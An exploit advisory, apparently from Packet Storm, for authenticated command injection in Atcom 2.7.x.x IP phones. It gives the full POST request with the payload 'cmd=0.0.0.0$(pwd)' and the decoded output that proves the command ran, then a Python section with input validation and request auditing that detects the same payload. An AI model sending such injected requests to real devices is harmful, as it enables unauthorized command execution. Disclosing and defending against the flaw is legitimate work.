Atcom 2.7.x.x Command Injection

Atcom version 2.7.x.x suffers from an authenticated remote code injection vulnerability.

Packet Storm
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux

Exploit Request:

POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone WebConfiguration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"

cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping

Response:

{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}

The value of "ping_cmd_result" is encoded as base64. Decoding the value of "ping_cmd_result" reveals the result of the command executed, as shown below:

ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
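The root cause described above is a ping handler that passes the user-supplied `cmd` value to a shell, so `$(...)` is expanded. The following is an added defender-side example, not code from the advisory or from the vendor: it validates the target as a bare IP literal, builds an argv list for a shell-free `subprocess.run`, and audits captured request bodies in the advisory's format. The parameter names come from the advisory; the `ping`/`ping6` binary names and the `-c 1` flag are assumptions about the device, and the sample bodies are constructed.

```python
import ipaddress
from urllib.parse import parse_qs


def parse_ping_target(body: str):
    """Extract the 'cmd' field from a user_get_phone_ping form body
    (format taken from the advisory). Returns None if the field is absent."""
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("cmd")
    return values[0] if values else None


def build_ping_argv(target: str) -> list:
    """Hardened replacement for running 'ping <target>' through a shell.
    The target must parse as a bare IPv4/IPv6 literal; anything else,
    including the advisory's '0.0.0.0$(pwd)', is rejected with ValueError.
    The returned list is meant for subprocess.run(argv) with shell=False,
    so no shell substitution can happen even if the target were odd.
    Binary names and '-c 1' are assumptions, not the device's real code."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"rejected ping target: {target!r}")
    binary = "ping6" if addr.version == 6 else "ping"
    return [binary, "-c", "1", str(addr)]


def audit_bodies(bodies):
    """Detection helper over captured POST bodies: mark every request whose
    ping target is not a plain IP address. Returns a list of (body, ok)."""
    findings = []
    for body in bodies:
        target = parse_ping_target(body)
        if target is None:
            findings.append((body, False))
            continue
        try:
            build_ping_argv(target)
            findings.append((body, True))
        except ValueError:
            findings.append((body, False))
    return findings


# Constructed sample bodies modelled on the advisory's request format.
SAMPLE_BODIES = [
    "cmd=192.0.2.10&ipv4_ipv6=0&user_get_phone_ping",
    "cmd=2001%3Adb8%3A%3A1&ipv4_ipv6=1&user_get_phone_ping",
    "cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping",  # advisory payload
]

if __name__ == "__main__":
    for body, ok in audit_bodies(SAMPLE_BODIES):
        print("OK     " if ok else "SUSPECT", parse_ping_target(body))
```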
